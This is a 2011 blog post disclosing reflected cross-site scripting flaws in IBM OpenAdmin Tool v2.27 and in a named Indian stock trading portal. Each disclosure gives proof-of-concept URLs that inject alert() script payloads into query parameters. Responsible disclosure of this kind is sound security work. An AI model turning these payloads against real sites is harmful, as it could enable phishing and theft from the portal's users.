Friday, August 19, 2011

XSS in IBM Open Admin Tool

                                                                          

  “XSS in IBM Open Admin Tool (OAT_2.27_install_windows.exe)”

Product version :  OAT v2.27

Vendore has been informed : July 27, 2010

They fix the vulnerability on : March 2011

Fixed version: OAT v2.72

Product Link:  https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=swg-informixfpd&lang=en_US&S_PKG=dl&cp=UTF-8

Tested on windows XP

Open Admin tool For IDS  Cross Site Scripting Vulnerability

OpenAdmin Tool is a PHP-based Web browser administration tool for managing one or more Informix Dynamic Servers. The OpenAdmin Tool for IDS provides the ability to monitor and administer multiple database IDS server instances from a single location.

There is a  XSS vulnerability exist in its index page for parameter named informixserver , host & port.

POC:

http://server:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver=<script>alert("server")</script>&host=<script>alert("host")</script>&port=<script>alert("port")</script>&username=<script>alert("username")</script>&userpass=<script>alert("userpass")</script>&idsprotocol=onsoctcp&conn_num

 

Regards

Sumit Kumar Soni

ssummit@gmail.com

Wednesday, July 20, 2011

Multiple XSS Vulnerabilities in Sharekhan trading Portal ( https://strade.sharekhan.com )

Vulnerability Description:

Sharekhan(Indian Stock Trading Portal) provides it’s user to trade in stock market & Manage their DP account also. Being in finance domain it should be secure & vulnerability free but it’s online portal “https://strade.sharekhan.com/” contains multiple XSS ( Cross site scripting) vulnerabilities those can be used against the site users for fishing & information gathering & can be turned to their financial losses . I have tried to contact the sharekhan but didn’t got any positive response yet. So I am reported these vulnerabilities to the cert.in for further action & co-ordination with sharekhan site administrator.

These are fairly simple to discover & exploit.

Type of vulnerability : Input validation ( XSS)

Product: Sharekhan trading Portal

POC :

(User login Required )

https://strade.sharekhan.com/rmmweb/adminpcs.sk?verify=<script>alert("sharekhan pwnd2!")</script>&cid=e69da5e2d0abdf87cd1315e04a85e8f84041f9a23e279914e9dc6d274f45bd1d&sid=07b5b5b79ae54d622c869d61eea3a1add607426665b97512

image

(User login is not required)

https://strade.sharekhan.com/rmmweb/AdminLoginServlet.sk?error=Your+Session+%3Cscript%3Ealert%28%22sharekhan pwnd2!%22%29%3C/script%3Esoniji+expired%2C+please+login&caller=https%253A%252F%252Fstrade.sharekhan.com%252Frmmweb%252Fadminpcs.sk%253F

image